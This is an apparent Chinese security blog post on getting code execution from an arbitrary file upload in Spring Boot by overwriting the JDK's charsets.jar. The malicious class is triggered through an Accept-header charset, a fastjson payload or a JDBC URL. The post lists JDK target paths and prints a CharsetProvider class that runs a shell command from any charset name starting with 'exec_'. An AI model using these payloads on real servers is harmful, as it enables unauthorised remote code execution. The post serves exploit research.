SpringBoot下的文件上传利用

2024-05-02

java

很多java环境下的程序，都是直接以一个jar包的形式运行的，当存在文件上传漏洞时，并不会直接解析jsp等模板文件。
这种情况下大多数的解决方案都是上传到计划任务、ssh key等，比较依赖系统的运行环境，对网络联通性也有要求。
以下是几种不依赖系统特性，在java层面，依靠任意文件写实现代码执行的方法。

覆盖charsets.jar

jvm采用懒加载，没有用到的class，不会加载到内存中。可以通过替换未加载的class所在的jar包，之后使其从上传的jar包中加载类。
上传时没办法上传到应用的jar中classpath中，但可以上传到JDK_HOME中。

注：windows下测试发现无法利用，无法覆盖已经打开的文件。1.需要inputStream的方式，才可以覆盖写入文件。2.覆盖写入后，需要重启

可以覆盖charsets.jar，构造恶意的字符集类，再通过指定http请求的字符集，触发上传的jar包
条件：

需要可以上传charsets.jar到JDK_HOME目录下,一般需要root权限，linux下监听1024以下端口默认都需要root。
jdk 自带文件 /jre/lib/***.jar 没被 Opened 过
- 以 charsets.jar 文件举例：程序代码中不使用 Charset.forName("GBK") 类似的调用，默认就不会 Opened charsets.jar 文件
- 值得注意的是，只能主动触发一次 Opened .jar 文件，如果漏洞利用没有成功，则同名 jar 文件就不能再利用了

分析

springboot下，会解析Accept头

1	Accept: text/plain; charset=ibm33722

在
org.springframework.http.MediaType#parseMediaType->
org.springframework.util.MimeTypeUtils#parseMimeTypeInternal

如果存在key中有charset，会用Charset.forName加载

1	org.springframework.util.MimeType#checkParameters

Charset.forName

在执行java.nio.charset.Charset#lookup2到，会通过三个方法依次来加载

sun.nio.cs.FastCharsetProvider#charsetForName -> rt.jar ->sun.nio.cs
sun.nio.cs.AbstractCharsetProvider#charsetForName ->charsets.jar -> sun.nio.cs.ext
java.nio.charset.Charset#lookupViaProviders 利用spi机制，加载providers，利用spi发现的providers，加载字符集。
前两种可以加载的字符集是不同的，并且都是固定的。

进入sun.nio.cs.FastCharsetProvider#charsetForName->sun.nio.cs.FastCharsetProvider#lookup
使用class.forName加载class

`sun.nio.cs.AbstractCharsetProvider#charsetForName

会先检测缓存中有没有，如果没有才会继续加载，并且必须是classMap中存在的字符集。加载过一次后，会加入到缓存中。
缓存中不存在的，通过Class.forName加载。
这里就可以替换charsets.jar，通过accept头，来使spring加载其他未使用过的字符集。

主要利用第二种加载方式，因为charsets.jar不包含任何核心的代码，相比于替换tr.jar,更稳定，并且文件更小。

调用栈

lookup:98, FastCharsetProvider (sun.nio.cs)
charsetForName:133, FastCharsetProvider (sun.nio.cs)
lookup2:475, Charset (java.nio.charset)
lookup:464, Charset (java.nio.charset)
forName:528, Charset (java.nio.charset)
checkParameters:235, MimeType (org.springframework.util)
lambda$new$0:190, MimeType (org.springframework.util)
accept:-1, 24872741 (org.springframework.util.MimeType$$Lambda$144)
forEach:684, LinkedHashMap (java.util)
<init>:189, MimeType (org.springframework.util)
parseMimeTypeInternal:269, MimeTypeUtils (org.springframework.util)
apply:-1, 118394766 (org.springframework.util.MimeTypeUtils$$Lambda$506)
get:107, ConcurrentLruCache (org.springframework.util)
parseMimeType:209, MimeTypeUtils (org.springframework.util)
parseMediaType:631, MediaType (org.springframework.http)
parseMediaTypes:660, MediaType (org.springframework.http)
parseMediaTypes:685, MediaType (org.springframework.http)

charsets.jar包含的字符集

Big5=IBM33722, Big5-HKSCS=IBM33722, EUC-JP=IBM33722, EUC-KR=IBM33722, GB18030=IBM33722, GB2312=IBM33722, GBK=IBM33722, IBM-Thai=IBM33722, IBM01140=IBM33722, IBM01141=IBM33722, IBM01142=IBM33722, IBM01143=IBM33722, IBM01144=IBM33722, IBM01145=IBM33722, IBM01146=IBM33722, IBM01147=IBM33722, IBM01148=IBM33722, IBM01149=IBM33722, IBM037=IBM33722, IBM1026=IBM33722, IBM1047=IBM33722, IBM273=IBM33722, IBM277=IBM33722, IBM278=IBM33722, IBM280=IBM33722, IBM284=IBM33722, IBM285=IBM33722, IBM290=IBM33722, IBM297=IBM33722, IBM420=IBM33722, IBM424=IBM33722, IBM500=IBM33722, IBM860=IBM33722, IBM861=IBM33722, IBM863=IBM33722, IBM864=IBM33722, IBM865=IBM33722, IBM868=IBM33722, IBM869=IBM33722, IBM870=IBM33722, IBM871=IBM33722, IBM918=IBM33722, ISO-2022-CN=IBM33722, ISO-2022-JP=IBM33722, ISO-2022-JP-2=IBM33722, ISO-2022-KR=IBM33722, ISO-8859-3=IBM33722, ISO-8859-6=IBM33722, ISO-8859-8=IBM33722, JIS_X0201=IBM33722, JIS_X0212-1990=IBM33722, Shift_JIS=IBM33722, TIS-620=IBM33722, windows-1255=IBM33722, windows-1256=IBM33722, windows-1258=IBM33722, windows-31j=IBM33722, x-Big5-HKSCS-2001=IBM33722, x-Big5-Solaris=IBM33722, x-COMPOUND_TEXT=IBM33722, x-euc-jp-linux=IBM33722, x-EUC-TW=IBM33722, x-eucjp-open=IBM33722, x-IBM1006=IBM33722, x-IBM1025=IBM33722, x-IBM1046=IBM33722, x-IBM1097=IBM33722, x-IBM1098=IBM33722, x-IBM1112=IBM33722, x-IBM1122=IBM33722, x-IBM1123=IBM33722, x-IBM1124=IBM33722, x-IBM1166=IBM33722, x-IBM1364=IBM33722, x-IBM1381=IBM33722, x-IBM1383=IBM33722, x-IBM300=IBM33722, x-IBM33722=IBM33722, x-IBM833=IBM33722, x-IBM834=IBM33722, x-IBM856=IBM33722, x-IBM875=IBM33722, x-IBM921=IBM33722, x-IBM922=IBM33722, x-IBM930=IBM33722, x-IBM933=IBM33722, x-IBM935=IBM33722, x-IBM937=IBM33722, x-IBM939=IBM33722, x-IBM942=IBM33722, x-IBM942C=IBM33722, x-IBM943=IBM33722, x-IBM943C=IBM33722, x-IBM948=IBM33722, x-IBM949=IBM33722, x-IBM949C=IBM33722, x-IBM950=IBM33722, x-IBM964=IBM33722, x-IBM970=IBM33722, x-ISCII91=IBM33722, x-ISO-2022-CN-CNS=IBM33722, x-ISO-2022-CN-GB=IBM33722, x-ISO-8859-11=IBM33722, x-JIS0208=IBM33722, x-JISAutoDetect=IBM33722, x-Johab=IBM33722, x-MacArabic=IBM33722, x-MacCentralEurope=IBM33722, x-MacCroatian=IBM33722, x-MacCyrillic=IBM33722, x-MacDingbat=IBM33722, x-MacGreek=IBM33722, x-MacHebrew=IBM33722, x-MacIceland=IBM33722, x-MacRoman=IBM33722, x-MacRomania=IBM33722, x-MacSymbol=IBM33722, x-MacThai=IBM33722, x-MacTurkish=IBM33722, x-MacUkraine=IBM33722, x-MS932_0213=IBM33722, x-MS950-HKSCS=IBM33722, x-MS950-HKSCS-XP=IBM33722, x-mswin-936=IBM33722, x-PCK=IBM33722, x-SJIS_0213=IBM33722, x-windows-50220=IBM33722, x-windows-50221=IBM33722, x-windows-874=IBM33722, x-windows-949=IBM33722, x-windows-950=IBM33722, x-windows-iso2022jp=IBM33722

构造jar包 && 利用

类名必须是 charsets.jar包含的字符集
利用时，Accept头中的charset和类名都是对应字符集中的key

jar包：

利用

上传
修改accept为类名对应的字符集

执行成功

结合fastjson下利用

没有进一步分析，记录一下payload

POST /fastjson HTTP/1.1
Content-Type: application/json

{
    "x":{
        "@type":"java.nio.charset.Charset",
        "val":"500"
    }
}

jdbc url getConnection

1	GET /jdbc?url=jdbc:mysql://127.0.0.1:3306/test?statementInterceptors=sun.nio.cs.ext.IBM33722

常见jdk目录

/usr/lib/jvm/jre/lib/
/usr/local/jdk/jre/lib/
/usr/local/openjdk-6/lib/
/usr/local/openjdk-7/lib/
/usr/local/openjdk-8/lib/
/usr/lib/jvm/java/jre/lib/
/usr/lib/jvm/jdk6/jre/lib/
/usr/lib/jvm/jdk7/jre/lib/
/usr/lib/jvm/jdk8/jre/lib/
/usr/lib/jvm/jdk-11.0.3/lib/
/usr/lib/jvm/jdk1.6/jre/lib/
/usr/lib/jvm/jdk1.7/jre/lib/
/usr/lib/jvm/jdk1.8/jre/lib/
/usr/local/openjdk6/jre/lib/
/usr/local/openjdk7/jre/lib/
/usr/local/openjdk8/jre/lib/
/usr/local/openjdk-6/jre/lib/
/usr/local/openjdk-7/jre/lib/
/usr/local/openjdk-8/jre/lib/
/mnt/jdk/jdk1.8.0_191/jre/lib/
/usr/lib/jvm/jdk1.6.0/jre/lib/
/usr/lib/jvm/jdk1.7.0/jre/lib/
/usr/lib/jvm/jdk1.8.0/jre/lib/
/usr/java/jdk1.8.0_111/jre/lib/
/usr/java/jdk1.8.0_121/jre/lib/
/usr/lib/jvm/java-6-oracle/lib/
/usr/lib/jvm/java-7-oracle/lib/
/usr/lib/jvm/java-8-oracle/lib/
/usr/lib/jvm/java-1.6.0/jre/lib/
/usr/lib/jvm/java-1.7.0/jre/lib/
/usr/lib/jvm/java-1.8.0/jre/lib/
/usr/lib/jvm/jdk1.7.0_51/jre/lib/
/usr/lib/jvm/jdk1.7.0_76/jre/lib/
/usr/lib/jvm/jdk1.8.0_60/jre/lib/
/usr/lib/jvm/jdk1.8.0_66/jre/lib/
/usr/lib/jvm/jdk1.8.0_74/jre/lib/
/usr/lib/jvm/jdk1.8.0_91/jre/lib/
/usr/lib/jvm/oracle_jdk6/jre/lib/
/usr/lib/jvm/oracle_jdk7/jre/lib/
/usr/lib/jvm/oracle_jdk8/jre/lib/
/usr/lib/jvm/jdk1.8.0_101/jre/lib/
/usr/lib/jvm/jdk1.8.0_102/jre/lib/
/usr/lib/jvm/jdk1.8.0_111/jre/lib/
/usr/lib/jvm/jdk1.8.0_131/jre/lib/
/usr/lib/jvm/jdk1.8.0_144/jre/lib/
/usr/lib/jvm/jdk1.8.0_151/jre/lib/
/usr/lib/jvm/jdk1.8.0_152/jre/lib/
/usr/lib/jvm/jdk1.8.0_161/jre/lib/
/usr/lib/jvm/jdk1.8.0_171/jre/lib/
/usr/lib/jvm/jdk1.8.0_172/jre/lib/
/usr/lib/jvm/jdk1.8.0_181/jre/lib/
/usr/lib/jvm/jdk1.8.0_191/jre/lib/
/usr/lib/jvm/jdk1.8.0_202/jre/lib/
/usr/lib/jvm/jdk8u202-b08/jre/lib/
/usr/lib/jvm/jre-6-oracle-x64/lib/
/usr/lib/jvm/jre-7-oracle-x64/lib/
/usr/lib/jvm/jre-8-oracle-x64/lib/
/usr/lib/jvm/zulu-6-amd64/jre/lib/
/usr/lib/jvm/zulu-7-amd64/jre/lib/
/usr/lib/jvm/zulu-8-amd64/jre/lib/
/usr/lib/jvm/java-6-oracle/jre/lib/
/usr/lib/jvm/java-7-oracle/jre/lib/
/usr/lib/jvm/java-8-oracle/jre/lib/
/usr/jdk/instances/jdk1.6.0/jre/lib/
/usr/jdk/instances/jdk1.7.0/jre/lib/
/usr/jdk/instances/jdk1.8.0/jre/lib/
/usr/lib/jvm/j2re1.6-oracle/jre/lib/
/usr/lib/jvm/j2re1.7-oracle/jre/lib/
/usr/lib/jvm/j2re1.8-oracle/jre/lib/
/usr/lib/jvm/java-1.6.0-sun/jre/lib/
/usr/lib/jvm/java-1.7.0-sun/jre/lib/
/usr/lib/jvm/java-1.8.0-sun/jre/lib/
/usr/lib/jvm/java-6-openjdk/jre/lib/
/usr/lib/jvm/java-7-openjdk/jre/lib/
/usr/lib/jvm/java-8-openjdk/jre/lib/
/usr/lib/jvm/j2sdk1.6-oracle/jre/lib/
/usr/lib/jvm/j2sdk1.7-oracle/jre/lib/
/usr/lib/jvm/j2sdk1.8-oracle/jre/lib/
/usr/lib/jvm/java-11-openjdk/jre/lib/
/usr/lib/jvm/java-12-openjdk/jre/lib/
/usr/lib/jvm/java-13-openjdk/jre/lib/
/usr/lib/jvm/java-1.6-openjdk/jre/lib/
/usr/lib/jvm/java-1.7-openjdk/jre/lib/
/usr/lib/jvm/java-1.8-openjdk/jre/lib/
/usr/lib/jvm/java-9-openjdk-amd64/lib/
/usr/lib/jvm/jdk-6-oracle-x64/jre/lib/
/usr/lib/jvm/jdk-7-oracle-x64/jre/lib/
/usr/lib/jvm/jdk-8-oracle-x64/jre/lib/
/usr/lib/jvm/jre-6-oracle-x64/jre/lib/
/usr/lib/jvm/jre-7-oracle-x64/jre/lib/
/usr/lib/jvm/jre-8-oracle-x64/jre/lib/
/usr/lib/jvm/java-10-openjdk-amd64/lib/
/usr/lib/jvm/java-11-openjdk-amd64/lib/
/usr/lib/jvm/java-1.11.0-openjdk/jre/lib/
/usr/lib/jvm/java-1.12.0-openjdk/jre/lib/
/usr/lib/jvm/java-6-openjdk-i386/jre/lib/
/usr/lib/jvm/java-6-sun-1.6.0.16/jre/lib/
/usr/lib/jvm/java-6-sun-1.6.0.20/jre/lib/
/usr/lib/jvm/java-7-openjdk-i386/jre/lib/
/usr/lib/jvm/java-8-openjdk-i386/jre/lib/
/usr/lib/jvm/java-6-openjdk-amd64/jre/lib/
/usr/lib/jvm/java-7-openjdk-amd64/jre/lib/
/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/
/usr/lib/jvm/java-1.6.0-oracle-x64/jre/lib/
/usr/lib/jvm/java-1.7.0-oracle-x64/jre/lib/
/usr/lib/jvm/java-1.8.0-oracle-x64/jre/lib/
/usr/lib/jvm/oracle-java6-jdk-amd64/jre/lib/
/usr/lib/jvm/oracle-java7-jdk-amd64/jre/lib/
/usr/lib/jvm/oracle-java8-jdk-amd64/jre/lib/
/usr/lib64/jvm/java-1.6.0-ibd-1.6.0/jre/lib/
/usr/lib64/jvm/java-1.6.0-ibm-1.6.0/jre/lib/
/usr/lib64/jvm/java-1.7.1-ibm-1.7.1/jre/lib/
/usr/lib/jvm/java-1.6.0-sun-1.6.0.11/jre/lib/
/usr/lib/jvm/java-1.6.0-openjdk-amd64/jre/lib/
/usr/lib/jvm/java-1.7.0-openjdk-amd64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-amd64/jre/lib/
/usr/lib/jvm/jre-1.6.0-openjdk.x86_64/jre/lib/
/usr/lib/jvm/jre-1.7.0-openjdk.x86_64/jre/lib/
/usr/lib/jvm/jre-1.8.0-openjdk.x86_64/jre/lib/
/usr/lib/jvm/java-1.11.0-openjdk-amd64/jre/lib/
/usr/lib/jvm/jdk-8-oracle-arm-vfp-hflt/jre/lib/
/usr/lib64/jvm/java-1.6.0-openjdk-1.6.0/jre/lib/
/usr/lib64/jvm/java-1.7.0-openjdk-1.7.0/jre/lib/
/usr/lib64/jvm/java-1.8.0-openjdk-1.8.0/jre/lib/
/usr/lib/jvm/java-1.6.0-openjdk-1.6.0.0.x86_64/jre/lib/
/usr/lib/jvm/java-1.7.0-openjdk-1.8.0.0.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-amazon-corretto.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.0.x86_64/jre/lib/
/usr/lib/jvm/java-1.7.0-openjdk-1.7.0.45.x86_64/jre/lib/
/usr/lib/jvm/java-1.7.0-openjdk-1.7.0.65.x86_64/jre/lib/
/usr/lib/jvm/java-1.7.0-openjdk-1.7.0.75.x86_64/jre/lib/
/usr/lib/jvm/java-1.7.0-openjdk-1.7.0.79.x86_64/jre/lib/
/usr/lib/jvm/java-1.7.0-openjdk-1.7.0.91.x86_64/jre/lib/
/usr/lib/jvm/java-1.7.0-openjdk-1.7.0.101.x86_64/jre/lib/
/usr/lib/jvm/java-1.7.0-openjdk-1.7.0.191.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.31-2.b13.el7.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.65-3.b17.el7.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.102-4.b14.el7.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.161-2.b14.el7.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.171-7.b10.el7.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.131-11.b12.el7.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.31-1.b13.el6_6.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.65-2.b17.el7_1.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.77-0.b03.el6_7.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.91-0.b14.el7_2.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.101-3.b13.el7_2.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.102-1.b14.el7_2.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.111-0.b15.el6_8.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.111-1.b15.el7_2.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.111-2.b15.el7_3.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.121-0.b13.el7_3.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.131-0.b11.el6_9.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.131-2.b11.el7_3.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.131-3.b12.el7_3.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.141-1.b16.el7_3.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.141-3.b16.el6_9.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.144-0.b01.el6_9.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.144-0.b01.el7_4.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.151-1.b12.el6_9.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.151-1.b12.el7_4.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.151-5.b12.el7_4.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.161-0.b14.el7_4.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.161-3.b14.el6_9.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.171-3.b10.el6_9.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.171-8.b10.amzn2.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.171-8.b10.el6_9.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.171-8.b10.el7_5.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.181-3.b13.amzn2.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.181-3.b13.el7_5.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.191.b12-0.amzn2.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.191.b12-0.el7_5.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.191.b12-1.el7_6.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.201.b09-0.amzn2.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.201.b09-2.el7_6.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.212.b04-0.el7_6.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.222.b10-0.el7_6.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.282.b08-1.el7_9.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.181-3.b13.el6_10.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.191.b12-0.el6_10.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.212.b04-0.el6_10.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.31-2.b13.5.amzn1.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.65-2.b17.7.amzn1.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.77-0.b03.9.amzn1.x86_64/jre/lib/
/usr/lib/jvm/java-1.7.0-openjdk-1.7.0.101-2.6.6.1.el7_2.x86_64/jre/lib/
/usr/lib/jvm/java-1.7.0-openjdk-1.7.0.131-2.6.9.0.el7_3.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.91-0.b14.10.amzn1.x86_64/jre/lib/
/usr/lib/jvm/java-1.7.0-openjdk-1.7.0.141-2.6.10.1.el7_3.x86_64/jre/lib/
/usr/lib/jvm/java-1.7.0-openjdk-1.7.0.171-2.6.13.0.el7_4.x86_64/jre/lib/
/usr/lib/jvm/java-1.7.0-openjdk-1.7.0.191-2.6.15.4.el7_5.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.101-3.b13.24.amzn1.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.111-1.b15.25.amzn1.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.121-0.b13.29.amzn1.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.131-2.b11.30.amzn1.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.141-1.b16.32.amzn1.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.151-1.b12.35.amzn1.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.161-0.b14.36.amzn1.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.171-7.b10.37.amzn1.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.171-8.b10.38.amzn1.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.191.b12-0.42.amzn1.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.201.b09-0.43.amzn1.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.212.b04-0.45.amzn1.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.171-8.b10.el7_5.x86_64-debug/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.181-8.b13.39.39.amzn1.x86_64/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.191.b12-0.el7_5.x86_64-debug/jre/lib/
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.191.b12-0.el6_10.x86_64-debug/jre/lib/

上传SPI class

比较鸡肋，默认配置下，难以利用，一般需要重启java。

上面提到的第三种加载字符集的方式
java.nio.charset.Charset#lookupViaProviders

使用SPI的方式，加载java.nio.charset.spi.CharsetProvider的实现类
通过charsetForName处理传入的charsetName。

上传到哪：
看一下java的三个classLoader的加载路径

除了指定的几个jar包外，还有一个目录jre\classes
可以把class文件和META目录上传到jre\classes这个路径下.
这种方式最大的问题是这个目录一般不是默认存在的，需要存在这个目录时，才可以利用。
程序启动后，再创建这个目录，也是不能直接利用的，因为classLoader不会去这个path下加载。

利用

构造class

import java.nio.charset.Charset;  
import java.nio.charset.spi.CharsetProvider;  
import java.util.Iterator;  
  
public class Oh3rCharsetProvider extends CharsetProvider {  
  
    @Override  
    public Iterator<Charset> charsets() {  
        return null;  
    }  
  
    @Override  
    public Charset charsetForName(String charsetName) {  
        if (charsetName.startsWith("exec_")){  
            try {  
                Runtime.getRuntime().exec(charsetName.substring("exec_".length()));  
            }catch (Exception e){  
  
            }  
        }  
        return null;  
    }  
}

1	Oh3rCharsetProvider

目录结构

分两次上传